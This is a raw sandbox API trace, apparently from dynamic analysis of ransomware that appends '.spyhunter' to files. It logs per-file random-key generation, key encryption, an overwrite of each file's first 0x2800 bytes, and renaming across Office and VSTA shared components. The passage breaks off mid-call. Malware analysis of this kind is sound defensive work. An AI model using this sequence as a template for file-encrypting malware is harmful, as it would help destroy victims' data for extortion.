GetProcessHeap () returned 0x2c0000 [0177.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e933f8 | out: hHeap=0x2c0000) returned 1 [0177.759] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e410 | out: pbBuffer=0x248e410) returned 1 [0177.759] GetProcessHeap () returned 0x2c0000 [0177.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e408*=0x30) returned 1 [0177.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.760] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll") returned 157 [0177.760] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.760] GetProcessHeap () returned 0x2c0000 [0177.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.760] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0177.857] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.857] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e3cc*=0x2800, lpOverlapped=0x0) returned 1 [0177.857] GetProcessHeap () returned 0x2c0000 [0177.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.857] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.857] WriteFile (in: hFile=0x9c, lpBuffer=0x248e40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x248e40c*, lpNumberOfBytesWritten=0x248e3cc*=0x4, lpOverlapped=0x0) returned 1 [0177.868] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3cc*=0x30, lpOverlapped=0x0) returned 1 [0177.869] CloseHandle (hObject=0x9c) returned 1 [0177.869] GetProcessHeap () returned 0x2c0000 [0177.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.869] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll.spyhunter") returned 167 [0177.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll.spyhunter")) returned 1 [0177.870] GetProcessHeap () returned 0x2c0000 [0177.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.870] GetProcessHeap () returned 0x2c0000 [0177.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0177.870] GetProcessHeap () returned 0x2c0000 [0177.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e93270 | out: hHeap=0x2c0000) returned 1 [0177.870] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e408 | out: pbBuffer=0x248e408) returned 1 [0177.870] GetProcessHeap () returned 0x2c0000 [0177.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0177.870] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e400*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e400*=0x30) returned 1 [0177.870] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.871] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll") returned 158 [0177.871] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.871] GetProcessHeap () returned 0x2c0000 [0177.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.871] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e3c4*=0x2800, lpOverlapped=0x0) returned 1 [0178.109] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.109] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e3c4*=0x2800, lpOverlapped=0x0) returned 1 [0178.110] GetProcessHeap () returned 0x2c0000 [0178.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.110] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.110] WriteFile (in: hFile=0x9c, lpBuffer=0x248e404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x248e404*, lpNumberOfBytesWritten=0x248e3c4*=0x4, lpOverlapped=0x0) returned 1 [0178.110] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3c4*=0x30, lpOverlapped=0x0) returned 1 [0178.110] CloseHandle (hObject=0x9c) returned 1 [0178.110] GetProcessHeap () returned 0x2c0000 [0178.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.110] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.spyhunter") returned 168 [0178.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.office.excel.addinadapter.v9.0.dll.spyhunter")) returned 1 [0178.112] GetProcessHeap () returned 0x2c0000 [0178.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.112] GetProcessHeap () returned 0x2c0000 [0178.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.112] GetProcessHeap () returned 0x2c0000 [0178.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d098b0 | out: hHeap=0x2c0000) returned 1 [0178.112] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e408 | out: pbBuffer=0x248e408) returned 1 [0178.112] GetProcessHeap () returned 0x2c0000 [0178.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.113] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e400*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e400*=0x30) returned 1 [0178.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.113] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll") returned 158 [0178.114] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll", lpSrch=".txt") returned 0x0 [0178.114] GetProcessHeap () returned 0x2c0000 [0178.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.114] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e3c4*=0x2800, lpOverlapped=0x0) returned 1 [0178.166] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.166] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e3c4*=0x2800, lpOverlapped=0x0) returned 1 [0178.166] GetProcessHeap () returned 0x2c0000 [0178.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.166] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.166] WriteFile (in: hFile=0x9c, lpBuffer=0x248e404*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x248e404*, lpNumberOfBytesWritten=0x248e3c4*=0x4, lpOverlapped=0x0) returned 1 [0178.167] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3c4*=0x30, lpOverlapped=0x0) returned 1 [0178.167] CloseHandle (hObject=0x9c) returned 1 [0178.167] GetProcessHeap () returned 0x2c0000 [0178.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.167] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.spyhunter") returned 168 [0178.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v9.0.dll.spyhunter")) returned 1 [0178.168] GetProcessHeap () returned 0x2c0000 [0178.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.168] GetProcessHeap () returned 0x2c0000 [0178.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.168] GetProcessHeap () returned 0x2c0000 [0178.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6ad38 | out: hHeap=0x2c0000) returned 1 [0178.168] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e400 | out: pbBuffer=0x248e400) returned 1 [0178.168] GetProcessHeap () returned 0x2c0000 [0178.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.168] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3f8*=0x30) returned 1 [0178.168] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.170] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb") returned 122 [0178.170] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb", lpSrch=".txt") returned 0x0 [0178.170] GetProcessHeap () returned 0x2c0000 [0178.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.170] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e3bc*=0x2800, lpOverlapped=0x0) returned 1 [0178.221] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.221] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e3bc*=0x2800, lpOverlapped=0x0) returned 1 [0178.221] GetProcessHeap () returned 0x2c0000 [0178.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.221] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.221] WriteFile (in: hFile=0x9c, lpBuffer=0x248e3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x248e3fc*, lpNumberOfBytesWritten=0x248e3bc*=0x4, lpOverlapped=0x0) returned 1 [0178.221] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3bc*=0x30, lpOverlapped=0x0) returned 1 [0178.221] CloseHandle (hObject=0x9c) returned 1 [0178.221] GetProcessHeap () returned 0x2c0000 [0178.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.221] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.spyhunter") returned 132 [0178.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb.spyhunter")) returned 1 [0178.222] GetProcessHeap () returned 0x2c0000 [0178.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.222] GetProcessHeap () returned 0x2c0000 [0178.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.223] GetProcessHeap () returned 0x2c0000 [0178.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3af20 | out: hHeap=0x2c0000) returned 1 [0178.223] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e400 | out: pbBuffer=0x248e400) returned 1 [0178.223] GetProcessHeap () returned 0x2c0000 [0178.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.223] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3f8*=0x30) returned 1 [0178.223] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.237] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB") returned 77 [0178.237] StrStrW (lpFirst="VBE6EXT.OLB", lpSrch=".txt") returned 0x0 [0178.238] GetProcessHeap () returned 0x2c0000 [0178.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.238] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3bc*=0x2800, lpOverlapped=0x0) returned 1 [0178.344] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.344] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3bc*=0x2800, lpOverlapped=0x0) returned 1 [0178.345] GetProcessHeap () returned 0x2c0000 [0178.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.345] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.345] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x248e3fc*, lpNumberOfBytesWritten=0x248e3bc*=0x4, lpOverlapped=0x0) returned 1 [0178.345] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3bc*=0x30, lpOverlapped=0x0) returned 1 [0178.345] CloseHandle (hObject=0xa0) returned 1 [0178.345] GetProcessHeap () returned 0x2c0000 [0178.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.345] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.spyhunter") returned 87 [0178.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb.spyhunter")) returned 1 [0178.347] GetProcessHeap () returned 0x2c0000 [0178.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.347] GetProcessHeap () returned 0x2c0000 [0178.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.347] GetProcessHeap () returned 0x2c0000 [0178.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9b60 | out: hHeap=0x2c0000) returned 1 [0178.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3f8 | out: pbBuffer=0x248e3f8) returned 1 [0178.347] GetProcessHeap () returned 0x2c0000 [0178.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3f0*=0x30) returned 1 [0178.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.349] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL") returned 78 [0178.349] StrStrW (lpFirst="OPHPROXY.DLL", lpSrch=".txt") returned 0x0 [0178.349] GetProcessHeap () returned 0x2c0000 [0178.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.349] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3b4*=0x2800, lpOverlapped=0x0) returned 1 [0178.446] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.446] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3b4*=0x2800, lpOverlapped=0x0) returned 1 [0178.446] GetProcessHeap () returned 0x2c0000 [0178.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.446] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.446] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x248e3f4*, lpNumberOfBytesWritten=0x248e3b4*=0x4, lpOverlapped=0x0) returned 1 [0178.505] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3b4*=0x30, lpOverlapped=0x0) returned 1 [0178.505] CloseHandle (hObject=0xa0) returned 1 [0178.505] GetProcessHeap () returned 0x2c0000 [0178.505] RtlAllocateHeap (HeapHandle=0x2c0000, 